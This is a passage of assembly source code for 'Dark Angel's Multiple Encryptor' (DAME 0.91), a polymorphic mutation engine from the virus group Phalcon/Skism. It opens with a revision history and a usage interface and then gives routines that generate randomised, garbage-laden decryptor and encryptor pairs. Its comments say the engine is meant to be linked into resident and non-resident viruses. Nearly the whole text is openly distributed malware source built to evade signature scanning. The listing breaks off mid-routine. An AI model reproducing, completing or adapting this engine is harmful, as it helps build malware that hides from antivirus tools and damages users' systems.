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1556 lines
63 KiB
NASM
1556 lines
63 KiB
NASM
comment #
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Dark Angel's Multiple Encryptor
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Version 0.91
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By Dark Angel of Phalcon/Skism
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This source may be freely distributed. Modifications are
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encouraged and modified redistribution is allowed provided
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this notice and the revision history to date are not altered.
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You are free to append to the revision history and update the
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usage information.
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Welcome to the source code for Dark Angel's Multiple Encryptor.
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I, Dark Angel, will be your host for this short excursion through
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a pretty nifty encryptor.
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DAME 0.90 (1574 bytes)
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~~~~ ~~~~ ~~~~~~~~~~~~
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Initial release.
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DAME 0.91 (1960 bytes)
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~~~~ ~~~~ ~~~~~~~~~~~~
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Source code commented.
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The user no longer needs to call the encryption routine manually;
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the routine calls it automatically. This makes DAME a bit more
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"user friendly."
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Garbling with two pointer registers simultaneously, i.e. [bx+di+offset]
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is now supported.
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Added "double-reference" encryptions. Example:
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mov ax,[bx+3212]
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xor ax,3213
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mov [bx+3212],ax
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There is now a bitflag option to generate a decryptor which will transfer
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control to the buffer on a paragraph boundary.
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There is now a 1% chance that no encryption will be encoded when
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the "do_encrypt1" routine is called. Of course, null effect
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encryptors may still be generated.
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garble_jmpcond is much more robust. It can now put valid instructions
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between the conditional jump and the target of the jump. Therefore,
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there is no longer a multitude of JZ $+2's and the like. Instead, they
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are replaced by JZ $+4, XOR BX,BX, for example.
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The register tracker is cleared after the loop is completed. This makes
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sense, since the registers are no longer needed. This also allows for the
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manipulation of those used registers in the garbling after the loop is
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completed.
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Encoding routines enhanced: Two-byte PUSHes and POPs and four-byte register
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MOVes added. Memory PUSHes and POPs are now supported.
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The maximum nesting value is now the variable _maxnest, which can range
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from 0 to MAXNEST. _maxnest is determined randomly at runtime. This makes
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the decryption routines a bit more interesting. _nest is also cleared more
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times during the run so that variability is continuous throughout.
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Short decryptor option added. This is automatically used when generating
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the encryptor so the encryptor will always be of minimal length.
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More alignments are now possible. This makes the initial values of the
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registers more flexible.
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BUG FIXES:
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BP is now preserved on exit
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Prefetch queue flushed on backwards encryption; 386+ hangs eliminated.
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See routine named "clear_PIQ"
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Loopnz routines had possibility of not working properly; instruction
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eliminated.
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NOTES:
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I forgot to give credit to the person from whom I stole the random number
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routines. I took them from the routine embedded in TPE 1.x (I misremember
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the version number). Many thanks to Masud Khafir!
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USAGE:
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ON ENTRY:
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ax = flags
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bit 15 : Use two registers for pointer : 0 = no, 1 = yes
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bit 14 : Align size : 0 = word, 1 = dword
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bit 13 : Encryption direction : 0 = forwards, 1 = backwards
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bit 12 : Counter direction : 0 = forwards, 1 = backwards
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bit 11 : Counter register used : 0 = no, 1 = yes
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bit 10 : Temporary storage for double reference
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bit 9 : Unused
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bit 8 : Unused
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bit 7 : Unused
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bit 6 : Unused
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bit 5 : Unused
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bit 4 : Unused
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bit 3 : return control on paragraph boundary : 1 = yes, 0 = no
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bit 2 : short decryptor : 1 = yes, 0 = no (implies no garbling)
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bit 1 : garble : 1 = yes, 0 = no
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bit 0 : SS = DS = CS : 1 = yes, 0 = no
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bx = start decrypt in carrier file
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cx = encrypt length
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dx = start encrypt
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si = buffer to put decryption routine
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di = buffer to put encryption routine
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ds = cs on entry
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es = cs on entry
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RETURNS:
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cx = decryption routine length
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DF cleared
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all other registers are preserved.
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The RADIX is set to 16d.
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NOTES:
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rnd_init_seed is _not_ called by DAME. The user must explicitly call it.
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The buffer containing the routine to be encrypted should be 20 bytes
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larger than the size of the routine. This allows padding to work.
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The decryption routine buffer should be rather large to accomodate the
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large decryptors which may be generated.
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The encryption routine buffer need not be very large; 80h bytes should
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suffice. 90d bytes is probably enough, but this value is untested.
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#
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.radix 10h
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ifndef vars
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vars = 2
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endif
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if not vars eq 1 ; if (vars != 1)
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_ax = 0
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_cx = 1
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_dx = 2
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_bx = 3
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_sp = 4
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_bp = 5
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_si = 6
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_di = 7
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_es = 8
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_cs = 9
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_ss = 0a
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_ds = 0bh
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; The constant MAXNEST determines the maximum possible level of nesting
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; possible in any generated routine. If the value is too large, then
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; recursion problems will cause a stack overflow and the program will
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; crash. So don't be too greedy. 0Ah is a safe value to use for non-
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; resident viruses. Use smaller values for resident viruses.
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ifndef MAXNEST ; User may define MAXNEST prior to including
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MAXNEST = 0a ; the DAME source code. The user's value will
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endif ; then take precedence
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rnd_init_seed:
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push dx cx bx
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mov ah,2C ; get time
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int 21
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in al,40 ; port 40h, 8253 timer 0 clock
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mov ah,al
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in al,40 ; port 40h, 8253 timer 0 clock
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xor ax,cx
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xor dx,ax
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jmp short rnd_get_loop_done
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get_rand:
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push dx cx bx
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in al,40 ; get from timer 0 clock
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db 5 ; add ax, xxxx
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rnd_get_patch1 dw 0
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db 0BA ; mov dx, xxxx
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rnd_get_patch2 dw 0
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mov cx,7
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rnd_get_loop:
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shl ax,1
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rcl dx,1
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mov bl,al
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xor bl,dh
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jns rnd_get_loop_loc
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inc al
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rnd_get_loop_loc:
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loop rnd_get_loop
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rnd_get_loop_done:
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mov rnd_get_patch1,ax
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mov rnd_get_patch2,dx
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mov al,dl
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pop bx cx dx
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retn
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reg_table1:
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; reg1 reg2 mod/00/rm This is used to handle memory addressing
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db _bx, 84, 10000111b ; of the form [reg1+reg2+xxxx]
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db _bp, 84, 10000110b ; if (reg2 == 84)
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db _di, 84, 10000101b ; reg2 = NULL;
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db _si, 84, 10000100b
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db _bp, _di, 10000011b
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db _bp, _si, 10000010b
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db _bx, _di, 10000001b
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db _bx, _si, 10000000b
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db _di, _bp, 10000011b
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db _si, _bp, 10000010b
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db _di, _bx, 10000001b
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db _si, _bx, 10000000b
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aligntable db 3,7,0bh,0f,13,17,1bh,1f ; possible alignment masks
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redo_dame:
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pop di bp si dx cx bx ax
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dame: ; Dark Angel's Multiple Encryptor
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cld
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push ax bx cx dx si bp di
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call _dame
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pop di
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push cx di
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call di
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pop di cx bp si dx bx bx ax
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ret
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_dame: ; set up initial values of the variables
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cld
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push ax
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mov ax,offset _encryptpointer
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xchg ax,di ; save the pointer to the
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stosw ; encryption routine buffer
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xchg si,ax ; also save the pointer to
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stosw ; the decryption routine
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; buffer in the same manner
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stosw
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xchg ax,dx ; starting offset of
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stosw ; encryption
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xchg ax,bx ; starting offset of
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stosw ; decryption routine
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xchg cx,dx ; dx = encrypt size
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xor ax,ax
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mov cx,(endclear1 - beginclear1) / 2; clear additional data
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rep stosw ; area
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call get_rand ; get a random number
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and ax,not 0f ; clear user-defined bits
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pop cx ; cx = bitmask
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xor cx,ax ; randomize top bits
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call get_rand_bx ; get a random number
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and bx,7 ; and lookup in the table
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mov al,byte ptr [bx+aligntable] ; for a random rounding size
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cbw
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add dx,ax ; round the encryption
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not ax ; size to next word, dword,
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and dx,ax ; etc.
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mov ax,dx ; save the new encryption
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stosw ; length (_encrypt_length)
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shr ax,1 ; convert to words
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test ch,40 ; encrypting double wordly?
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jz word_encryption ; nope, only wordly encryption
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shr ax,1 ; convert to double words
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word_encryption: ; all the worldly encryption
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test ch,10 ; shall do thee no good, my
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jnz counter_backwards ; child, lest you repent for
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neg ax ; the sins of those who would
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counter_backwards: ; bring harm unto others
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stosw ; save _counter_value
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push dx ; Save rounded length
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call get_rand ; get a random value for the
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stosw ; encryption value
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; (_decrypt_value)
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pop ax ; get rounded encryption length
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; in bytes
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test ch,20 ; is the encryption to run
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jnz encrypt_forwards ; forwards or backwards?
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neg ax ; Adjust for forwards
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encrypt_forwards:
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xor bx,bx ; Assume pointer_value2 = 0
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test ch,80 ; Dual pointer registers?
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jz no_dual
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call get_rand_bx
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sub ax,bx
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no_dual:stosw ; Save the pointers to the
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xchg ax,bx ; decryption (_pointer_value1
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stosw ; and _pointer_value2)
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; The following lines determine the registers that go with each function.
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; There are a maximum of four variable registers in each generated
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; encryption/decryption routine pair -- the counter, two pointer registers,
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; and an encryption value register. Only one pointer register need be present
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; in the pair; the other three registers are present only if they are needed.
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s0: call clear_used_regs
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mov di,offset _counter_reg
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mov al,84 ; Assume no counter register
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test ch,8 ; Using a counter register?
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jz s1
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call get_rand ; get a random initial value
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mov _pointer_value1,ax ; for the pointer register
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call get_another ; get a counter register
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s1: stosb ; Store the counter register
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xchg ax,dx
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mov al,84 ; Assume no encryption register
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call one_in_two ; 50% change of having an
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js s2 ; encryption register
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; Note: This merely serves as
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; an extra register and may or
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; may not be used as the
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; encryption register.
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call get_another ; get a register to serve as
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s2: stosb ; the encryption register
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cmp ax,dx ; normalise counter/encryption
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ja s3 ; register pair so that the
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xchg ax,dx ; smaller one is always in the
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s3: mov ah,dl ; high byte
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cmp ax,305 ; both BX and BP used?
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jz s0 ; then try again
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cmp ax,607 ; both SI and DI used?
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jz s0 ; try once more
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s4: mov si,offset reg_table1 ; Use the table
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mov ax,3 ; Assume one pointer register
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test ch,80 ; Using two registers?
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jz use_one_pointer_reg
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add si,4*3 ; Go to two register table
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add al,4 ; Then use appropriate mask
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use_one_pointer_reg:
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call get_rand_bx ; Get a random value
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and bx,ax ; Apply mask to it
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add si,bx ; Adjust table offset
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add bx,bx ; Double the mask
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add si,bx ; Now table offset is right
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lodsw ; Get the random register pair
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mov bx,ax ; Check if the register in the
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and bx,7 ; low byte is already used
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cmp byte ptr [bx+_used_regs],0
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jnz s4 ; If so, try again
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mov bl,ah ; Otherwise, check if there is
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or bl,bl ; a register in the high byte
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js s5 ; If not, we are done
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cmp byte ptr [bx+_used_regs],0 ; Otherwise, check if it is
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jnz s4 ; already used
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s5: stosw ; Store _pointer_reg1,
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movsb ; _pointer_reg2, and
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; _pointer_rm
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calculate_maxnest:
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call get_rand ; Random value for _maxnest
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and al,0f ; from 0 to MAXNEST
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cmp al,MAXNEST ; Is it too large?
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ja calculate_maxnest ; If so, try again
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stosb ; Otherwise, we have _maxnest
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call clear_used_regs ; mark no registers used
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encode_setup: ; encode setup portion
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mov di,_decryptpointer ; (pre-loop) of the routines
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call twogarble ; start by doing some garbling
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; on the decryption routine
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mov si,offset _counter_reg ; now move the initial
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push si ; values into each variable
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encode_setup_get_another: ; register -- encode them in a
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call get_rand_bx ; random order for further
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; variability
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and bx,3 ; get a random register to en-
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mov al,[si+bx] ; code, i.e. counter, pointer,
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cbw ; or encryption value register
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test al,80 ; is it already encoded?
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jnz encode_setup_get_another ; then get another register
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or byte ptr [bx+_counter_reg],80 ; mark it encoded in both the
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mov si,ax ; local and
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inc byte ptr [si+_used_regs] ; master areas
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add bx,bx ; convert to word offset
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mov dx,word ptr [bx+_counter_value] ; find value to set the
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; register to
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mov _nest,0 ; clear the current nest count
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call mov_reg_xxxx ; and encode decryption routine
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; instruction
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call twogarble ; garble it some more
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call swap_decrypt_encrypt ; now work on the encryption
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; routine
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push cx ; save the current bitmap
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and cl,not 7 ; encode short routines only
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call _mov_reg_xxxx ; encode the encryption routine
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; instruction
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pop cx ; restore bitmap
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mov _encryptpointer,di ; return attention to the
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; decryption routine
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pop si
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mov dx,4
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encode_setup_check_if_done: ; check if all the variables
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; have been encoded
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lodsb ; get the variable
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test al,80 ; is it encoded?
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jz encode_setup ; nope, so continue encoding
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dec dx ; else check the next variable
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jnz encode_setup_check_if_done ; loop upwards
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mov si,offset _encryptpointer ; Save the addresses of the
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mov di,offset _loopstartencrypt ; beginning of the loop in
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movsw ; the encryption and decryption
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movsw ; routines
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; Encode the encryption/decryption part of loop
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mov _relocate_amt,0 ; reset relocation amount
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call do_encrypt1 ; encode encryption
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test ch,40 ; dword encryption?
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jz dont_encrypt2 ; nope, skip
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mov _relocate_amt,2 ; handle next word to encrypt
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call do_encrypt1 ; and encrypt!
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dont_encrypt2:
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; Now we are finished encoding the decryption part of the loop. All that
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; remains is to encode the loop instruction, garble some more, and patch
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; the memory manipulation instructions so they encrypt/decrypt the proper
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; memory locations.
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mov bx,offset _loopstartencrypt ; first work on the encryption
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push cx ; save the bitmap
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and cl,not 7 ; disable garbling/big routines
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call encodejmp ; encode the jmp instruction
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pop cx ; restore the bitmap
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mov ax,0c3fc ; cld, ret ; encode return instruction
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stosw ; in the encryption routine
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mov si,offset _encrypt_relocator ; now fix the memory
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mov di,_start_encrypt ; manipulation instructions
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push cx ; cx is not auto-preserved
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call relocate ; fix address references
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pop cx ; restore cx
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mov bx,offset _loopstartdecrypt ; Now work on decryption
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call encodejmp ; Encode the jmp instruction
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push di ; Save the current pointer
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call clear_used_regs ; Mark all registers unused
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pop di ; Restore the pointer
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call twogarble ; Garble some more
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test cl,8 ; Paragraph alignment on
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jnz align_paragraph ; entry to virus?
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test ch,20 ; If it is a backwards
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jz no_clear_prefetch ; decryption, then flush the
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call clear_PIQ ; prefetch queue (for 386+)
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no_clear_prefetch: ; Curse the PIQ!!!!!
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call twogarble ; Garble: the final chapter
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jmp short PIQ_done
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align_paragraph:
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mov dx,di ; Get current pointer location
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sub dx,_decryptpointer2 ; Calculate offset when control
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add dx,_start_decrypt ; is transfered to the carrier
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inc dx ; Adjust for the JMP SHORT
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inc dx
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neg dx
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and dx,0f ; Align on the next paragraph
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cmp dl,10-2 ; Do we need to JMP?
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jnz $+7 ; Yes, do it now
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test ch,20 ; Otherwise, check if we need
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jz PIQ_done ; to clear the prefetch anyway
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call clear_PIQ_jmp_short ; Encode the JMP SHORT
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PIQ_done:
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mov _decryptpointer,di
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mov si,offset _decrypt_relocator ; Calculate relocation amount
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sub di,_decryptpointer2
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add di,_start_decrypt
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relocate:
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test ch,20 ; Encrypting forwards or
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jz do_encrypt_backwards ; backwards?
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add di,_encrypt_length ; Backwards is /<0oI_
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do_encrypt_backwards: ; uh huh uh huh uh huh
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sub di,_pointer_value1 ; Calculate relocation amount
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sub di,_pointer_value2
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mov cx,word ptr [si-2] ; Get relocation count
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jcxz exit_relocate ; Exit if nothing to do
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xchg ax,di ; Otherwise we be in business
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relocate_loop: ; Here we go, yo
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xchg ax,di
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lodsw ; Get address to relocate
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xchg ax,di
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add [di],ax ; Relocate mah arse!
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loop relocate_loop ; Do it again 7 times
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exit_relocate: ; ('cause that makes 8)
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mov di,_decryptpointer ; Calculate the decryption
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mov cx,di ; routine size to pass
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sub cx,_decryptpointer2 ; back to the caller
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ret
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encodejmp:
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mov di,word ptr [bx+_encryptpointer-_loopstartencrypt]
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push bx
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mov _nest,0 ; Reset nest count
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mov al,_pointer_reg1 ; Get the pointer register
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and ax,7 ; Mask out any modifications
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mov dx,2 ; Assume word encryption
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test ch,40 ; Word or Dword?
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|
jz update_pointer1
|
|
shl dx,1 ; Adjust for Dword encryption
|
|
update_pointer1:
|
|
test ch,20 ; Forwards or backwards?
|
|
jz update_pointer2
|
|
neg dx ; Adjust for backwards
|
|
update_pointer2:
|
|
test ch,80 ; Are there two pointers?
|
|
jz update_pointer_now ; Continue only if so
|
|
|
|
sar dx,1 ; Halve the add value
|
|
push ax ; Save register to add
|
|
call add_reg_xxxx ; Add to first register
|
|
mov al,_pointer_reg2
|
|
and ax,7 ; Add to the second pointer
|
|
call add_reg_xxxx ; register
|
|
pop bx
|
|
test ch,8 ; Using a counter register?
|
|
jnz update_pointer_done ; If not, continue this
|
|
|
|
push bx ; Save first register
|
|
xchg ax,dx ; Move second register to DX
|
|
call get_another ; Get new register regX
|
|
call mov_reg_reg ; MOV regX, _pointer_reg2
|
|
pop dx ; Restore first register
|
|
call add_reg_reg ; ADD regX, _pointer_reg1
|
|
call clear_reg ; Clear the temp register
|
|
jmp short update_pointer_done ; Skip adjustment of pointer
|
|
; register (already done)
|
|
update_pointer_now:
|
|
call add_reg_xxxx ; Adjust pointer register
|
|
update_pointer_done:
|
|
mov dl,75 ; Assume JNZ
|
|
|
|
mov al,_counter_reg ; Is there a counter register?
|
|
and ax,7
|
|
cmp al,_sp
|
|
jz do_jnz
|
|
|
|
push dx ; Save JNZ
|
|
mov dx,1 ; Assume adjustment of one
|
|
|
|
test ch,10 ; Check counter direction
|
|
jz go_counter_forwards ; If forwards, increment the
|
|
; counter
|
|
cmp al,_cx ; Check if the counter is CX
|
|
jnz regular ; If not, then decrement the
|
|
; counter and continue
|
|
call one_in_two ; Otherwise, there is a 50%
|
|
js regular ; chance of using a LOOP
|
|
|
|
pop dx
|
|
mov dl,0e2 ; let us encode the LOOP
|
|
jmp short do_jnz
|
|
|
|
regular:neg dx
|
|
go_counter_forwards:
|
|
call add_reg_xxxx ; Adjust counter register
|
|
pop dx
|
|
do_jnz: pop bx
|
|
mov ax,[bx] ; Calculate value to JNZ/LOOP
|
|
sub ax,di ; back
|
|
dec ax
|
|
dec ax
|
|
xchg ah,al ; Value is in AL
|
|
mov al,dl ; jnz
|
|
|
|
or ah,ah ; Value >= 128? If so, it is
|
|
js jmplocation_okay ; impossible to JNZ/LOOP there
|
|
; due to stupid 8086 limitation
|
|
pop ax ax ; Take return locations off
|
|
jmp redo_dame ; the stack and encode again
|
|
jmplocation_okay:
|
|
stosw ; Encode JNZ/LOOP instruction
|
|
mov word ptr [bx+_encryptpointer-_loopstartencrypt],di
|
|
ret ; Save current location
|
|
|
|
encryption:
|
|
; This routine encodes the instruction which actually manipulates the memory
|
|
; location pointed to by the pointer register.
|
|
and ch,not 4 ; Default = no double reference
|
|
call one_in_two ; But there is a 50% chance of
|
|
js not_double_reference ; using a double reference
|
|
or ch,4 ; Yes, we are indeed using it
|
|
not_double_reference:
|
|
mov di,_decryptpointer ; Set the registers to work
|
|
mov bp,offset _decrypt_relocate_num ; with the decryption routine
|
|
call twogarble ; Insert some null instructions
|
|
|
|
xor ax,ax ; Get the value for the rm
|
|
mov al,_pointer_rm ; field corresponding to the
|
|
; pointer register/s used
|
|
call choose_routine ; Get random decryption type
|
|
call go_next ; to DX, BX, SI
|
|
push si dx si dx ; Save crypt value/register
|
|
; and crypt pointer
|
|
;; mov _nest,0 ; not needed - choose_routine does it
|
|
test ch,4
|
|
jz not_double_reference1 ; Double reference?
|
|
|
|
xchg ax,dx ; Pointer register/s to dx
|
|
call get_another ; Unused register to AX (reg1)
|
|
call mov_reg_reg ; MOV reg1,[pointer]
|
|
mov _kludge,dx ; Store the pointer register
|
|
not_double_reference1:
|
|
pop dx si ; Restore decryption pointer
|
|
call handle_jmp_table ; Encode decryption routine
|
|
push bx ; Save routine that was used
|
|
call twogarble ; Garble some more for fun
|
|
|
|
test ch,4
|
|
jz not_double_reference2 ; Double reference?
|
|
|
|
xchg ax,dx ; reg1 to dx
|
|
mov ax,_kludge ; Restore pointer
|
|
push ax ; Save pointer
|
|
call mov_reg_reg ; MOV [pointer],reg1
|
|
call clear_reg_dx ; Return reg1 to free pool
|
|
pop ax ; Restore pointer
|
|
not_double_reference2:
|
|
mov bp,offset _encrypt_relocate_num ; Set the registers to work
|
|
call swap_decrypt_encrypt ; with the encryption routine
|
|
|
|
pop bx dx si ; Restore crypt value/register
|
|
call go_next ; Convert to encryption table
|
|
jmp short finish_encryption ; and encode the encryption
|
|
; corresponding to the
|
|
; decryption
|
|
do_encrypt1: ; Perform encryption on a word
|
|
call playencrypt ; Alter encryption value
|
|
call get_rand ; Have a tiny chance
|
|
cmp ax,6 ; (1% chance) of not
|
|
jb playencrypt ; encrypting at all
|
|
call encryption ; Encrypt!
|
|
playencrypt: ; Update the encryption value
|
|
mov di,_decryptpointer
|
|
call twogarble
|
|
|
|
mov al,_encrypt_reg ; Encryption register used?
|
|
and ax,7
|
|
cmp al,4
|
|
jz swap_decrypt_encrypt
|
|
|
|
call get_rand_bx ; 75% chance of altering the
|
|
cmp bl,0c0 ; encryption value register
|
|
ja swap_decrypt_encrypt ; Exit if nothing is to occur
|
|
|
|
call choose_routine ; Select a method of updating
|
|
call handle_jmp_table_nogarble ; Encode the decryption
|
|
call swap_decrypt_encrypt ; Now work on encryption
|
|
finish_encryption:
|
|
push cx ; Save current bitmask
|
|
and cl,not 7 ; Turn off garbling/mo routines
|
|
call [bx+si+1] ; Encode the same routine for
|
|
; the encryption
|
|
pop cx ; Restore the bitmask
|
|
mov _encryptpointer,di
|
|
ret
|
|
|
|
choose_routine:
|
|
mov _nest,0 ; Reset recursion counter
|
|
call one_in_two ; 50% chance of using an
|
|
js get_used_register ; already used register as
|
|
; an update value
|
|
call get_rand_bx ; Get random number as the
|
|
; update value
|
|
mov si,offset oneregtable ; Choose the update routine
|
|
; from this table
|
|
jmp short continue_choose_routine ; Saves one byte over
|
|
; xchg dx,bx / ret
|
|
get_used_register:
|
|
; This routine returns, in DX, a register whose value is known at the current
|
|
; point in the encryption/decryption routines. SI is loaded with the offset
|
|
; of the appropriate table. The routine destroys BX.
|
|
call get_rand_bx ; Get a random number
|
|
and bx,7 ; Convert to a register (0-7)
|
|
cmp bl,_sp ; Make sure it isn't SP; that
|
|
jz get_used_register ; is always considered used
|
|
cmp byte ptr [bx+_used_regs],0 ; Check if the register is
|
|
jz get_used_register ; currently in use
|
|
mov si,offset tworegtable ; Use routine from this table
|
|
continue_choose_routine:
|
|
xchg dx,bx ; Move value to dx
|
|
ret ; and quit
|
|
|
|
swap_decrypt_encrypt:
|
|
mov _decryptpointer,di ; save current pointer
|
|
push ax
|
|
mov al,_maxnest ; disable garbling
|
|
mov _nest,al
|
|
pop ax
|
|
mov di,_encryptpointer ; replace with encryption
|
|
ret ; pointer
|
|
|
|
go_next:
|
|
; Upon entry, SI points to a dispatch table. This routine calculates the
|
|
; address of the next table and sets SI to that value.
|
|
push ax
|
|
lodsb ; Get mask byte
|
|
cbw ; Convert it to a word
|
|
add si,ax ; Add it to the current
|
|
pop ax ; location (table+1)
|
|
inc si ; Add two more to adjust
|
|
inc si ; for the mask
|
|
ret ; (mask = size - 3)
|
|
|
|
clear_used_regs:
|
|
xor ax,ax ; Mark registers unused
|
|
mov di,offset _used_regs ; Alter _used_regs table
|
|
stosw
|
|
stosw
|
|
inc ax ; Mark SP used
|
|
stosw
|
|
dec ax
|
|
stosw
|
|
ret
|
|
|
|
get_another: ; Get an unused register
|
|
call get_rand ; Get a random number
|
|
and ax,7 ; convert to a register
|
|
; cmp al,_sp
|
|
; jz get_another
|
|
mov si,ax
|
|
cmp [si+_used_regs],0 ; Check if used already
|
|
jnz get_another ; Yes, try again
|
|
inc [si+_used_regs] ; Otherwise mark the register
|
|
ret ; used and return
|
|
|
|
clear_reg_dx: ; Mark the register in DX
|
|
xchg ax,dx ; unused
|
|
clear_reg: ; Mark the register in AX
|
|
mov si,ax ; unused
|
|
mov byte ptr [si+_used_regs],0
|
|
ret
|
|
|
|
free_regs:
|
|
; This checks for any free registers and sets the zero flag if there are.
|
|
push ax cx di
|
|
mov di,offset _used_regs
|
|
mov cx,8
|
|
xor ax,ax
|
|
repne scasb
|
|
pop di cx ax
|
|
ret
|
|
|
|
one_in_two: ; Gives 50% chance of
|
|
push ax ; something happening
|
|
call get_rand ; Get a random number
|
|
or ax,ax ; Sign flag set 50% of the
|
|
pop ax ; time
|
|
ret
|
|
|
|
get_rand_bx: ; Get a random number to BX
|
|
xchg ax,bx ; Save AX
|
|
call get_rand ; Get a random number
|
|
xchg ax,bx ; Restore AX, set BX to the
|
|
return: ; random number
|
|
ret
|
|
|
|
garble_onebyte:
|
|
; Encode a single byte that doesn't do very much, i.e. sti, int 3, etc.
|
|
xchg ax,dx ; Get the random number in AX
|
|
and al,7 ; Convert to table offset
|
|
mov bx,offset onebytetable ; Table of random bytes
|
|
xlat ; Get the byte
|
|
stosb ; and encode it
|
|
ret
|
|
|
|
garble_jmpcond:
|
|
; Encode a random short conditional or unconditional JMP instruction. The
|
|
; target of the JMP is an unspecified distance away. Valid instructions
|
|
; take up the space between the JMP and the target.
|
|
xchg ax,dx ; Random number to AX
|
|
and ax,0f ; Convert to a random JMP
|
|
or al,70 ; instruction
|
|
stosw ; Encode it
|
|
push di ; Save current location
|
|
call garble ; May need to check if too large
|
|
mov ax,di ; Get current location
|
|
pop bx ; Restore pointer to the JMP
|
|
sub ax,bx ; Calculate the offset
|
|
mov byte ptr [bx-1], al ; Put it in the conditional
|
|
ret ; JMP
|
|
|
|
clear_PIQ:
|
|
; Encode instructions that clear the prefetch instruction queue.
|
|
; CALL/POP
|
|
; JMP SHORT
|
|
; JMP
|
|
call get_rand ; Get a random number
|
|
mov dl,ah ; Put high byte in DL
|
|
and dx,0f ; Adjust so JMP target is
|
|
; between 0 and 15 bytes away
|
|
and ax,3 ; Mask AX
|
|
jz clear_PIQ_call_pop ; 1/4 chance of CALL/POP
|
|
dec ax
|
|
jz clear_PIQ_jmp_short ; 1/4 chance of JMP SHORT
|
|
|
|
mov al,0e9 ; Otherwise do a straight JMP
|
|
clear_PIQ_word: ; Handler if offset is a word
|
|
stosb ; Store the JMP or CALL
|
|
xchg ax,dx ; Offset to AX
|
|
stosw ; Encode it
|
|
clear_PIQ_byte: ; Encode AX random bytes
|
|
push cx
|
|
xchg ax,cx ; Offset to CX
|
|
jcxz random_encode_done ; Exit if no bytes in between
|
|
random_encode_loop:
|
|
call get_rand ; Get a random number
|
|
stosb ; Store it and then do this
|
|
loop random_encode_loop ; again
|
|
random_encode_done:
|
|
pop cx
|
|
ret
|
|
|
|
clear_PIQ_jmp_short:
|
|
mov al,0ebh ; JMP SHORT
|
|
stosb ; Encode the instruction
|
|
xchg ax,dx
|
|
stosb ; and the offset
|
|
jmp short clear_PIQ_byte ; Encode intervening bytes
|
|
|
|
clear_PIQ_call_pop:
|
|
mov al,0e8 ; CALL
|
|
call clear_PIQ_word ; Encode instruction, garbage
|
|
call garble ; Garble some and then find
|
|
call get_another ; an unused register
|
|
call clear_reg ; keep it unused
|
|
jmp short _pop ; and POP into it
|
|
|
|
twogarble: ; Garble twice
|
|
mov _nest,0 ; Reset nest count
|
|
call garble ; Garble once
|
|
garble: ; ax, dx preserved ; Garble
|
|
call free_regs ; Are there any unused
|
|
jne return ; registers?
|
|
|
|
test cl,2 ; Is garbling enabled?
|
|
jz return ; Exit if not
|
|
|
|
push ax dx si
|
|
|
|
call get_rand ; Get a random number into
|
|
xchg ax,dx ; DX
|
|
call get_another ; And a random reg into AX
|
|
call clear_reg ; Don't mark register as used
|
|
|
|
mov si,offset garbletable ; Garble away
|
|
jmp short handle_jmp_table_nopush
|
|
|
|
handle_jmp_table: ; ax,dx preserved ; This is the master dispatch
|
|
call garble ; Garble before encoding
|
|
handle_jmp_table_nogarble: ; Encode it
|
|
push ax dx si
|
|
handle_jmp_table_nopush:
|
|
push ax
|
|
lodsb ; Get table mask
|
|
cbw ; Clear high byte
|
|
call get_rand_bx ; Get random number
|
|
and bx,ax ; Get random routine
|
|
pop ax
|
|
|
|
test cl,4 ; Short decryptor?
|
|
jnz doshort ; If so, use first routine
|
|
|
|
inc _nest ; Update nest count
|
|
push ax
|
|
mov al,_maxnest
|
|
cmp _nest,al ; Are we too far?
|
|
pop ax
|
|
jb not_max_nest ; If so, then use the first
|
|
doshort:xor bx,bx ; routine in the table
|
|
not_max_nest:
|
|
push bx ; Save routine to be called
|
|
call [bx+si] ; Call the routine
|
|
pop bx si dx ax
|
|
ret
|
|
|
|
garble_tworeg:
|
|
; Garble unused register with the contents of a random register.
|
|
mov si,offset tworegtable ; Use reg_reg table
|
|
and dx,7 ; Convert to random register #
|
|
jmp short handle_jmp_table_nogarble ; Garble away
|
|
|
|
garble_onereg:
|
|
; Garble unused register with a random value (DX).
|
|
mov si,offset oneregtable ; Point to the table
|
|
jmp short handle_jmp_table_nogarble ; and garble
|
|
|
|
_push: ; Encode a PUSH
|
|
or al,al ; PUSHing memory register?
|
|
js _push_mem
|
|
call one_in_two ; 1/2 chance of two-byte PUSH
|
|
js _push_mem
|
|
add al,50 ; otherwise it's really easy
|
|
stosb
|
|
ret
|
|
_push_mem:
|
|
add ax,0ff30
|
|
jmp short go_mod_xxx_rm1
|
|
|
|
_pop: ; Encode a POP
|
|
or al,al ; POPing a memory register?
|
|
js _pop_mem
|
|
call one_in_two ; 1/2 chance of two-byte POP
|
|
js _pop_mem
|
|
add al,58
|
|
stosb
|
|
ret
|
|
_pop_mem:
|
|
mov ah,8f
|
|
go_mod_xxx_rm1:
|
|
jmp mod_xxx_rm
|
|
|
|
mov_reg_xxxx: ; ax and dx preserved
|
|
mov si,offset mov_reg_xxxx_table
|
|
go_handle_jmp_table1:
|
|
jmp short handle_jmp_table
|
|
|
|
_mov_reg_xxxx_mov_add:
|
|
call get_rand_bx ; Get a random number
|
|
push bx ; Save it
|
|
sub dx,bx ; Adjust MOV amount
|
|
call mov_reg_xxxx ; MOV to register
|
|
pop dx ; Get random number
|
|
jmp short go_add_reg_xxxx ; Add it to the register
|
|
|
|
_mov_reg_xxxx_mov_al_ah:
|
|
cmp al,_sp
|
|
jae _mov_reg_xxxx
|
|
push ax dx
|
|
call _mov_al_xx
|
|
pop dx ax
|
|
xchg dh,dl
|
|
jmp short _mov_ah_xx
|
|
|
|
_mov_reg_xxxx_mov_xor:
|
|
call get_rand_bx
|
|
push bx
|
|
xor dx,bx
|
|
call mov_reg_xxxx
|
|
pop dx
|
|
jmp xor_reg_xxxx
|
|
|
|
_mov_reg_xxxx_xor_add:
|
|
push dx
|
|
mov dx,ax
|
|
call xor_reg_reg
|
|
pop dx
|
|
go_add_reg_xxxx:
|
|
jmp add_reg_xxxx
|
|
|
|
_mov_reg_xxxx_mov_rol:
|
|
ror dx,1
|
|
call mov_reg_xxxx
|
|
jmp short _rol
|
|
|
|
_mov_reg_xxxx_mov_ror:
|
|
rol dx,1
|
|
call mov_reg_xxxx
|
|
_ror:
|
|
or al,8
|
|
_rol:
|
|
mov ah,0d1
|
|
jmp short go_mod_xxx_rm1
|
|
|
|
|
|
_mov_reg_xxxx:
|
|
call one_in_two ; 1/2 chance of a four byte MOV
|
|
js _mov_reg_xxxx1
|
|
|
|
add al,0B8
|
|
stosb
|
|
xchg ax,dx
|
|
stosw
|
|
ret
|
|
_mov_reg_xxxx1: ; Do the four byte register MOV
|
|
mov ah,0c7
|
|
jmp mod_xxx_rm_stosw
|
|
|
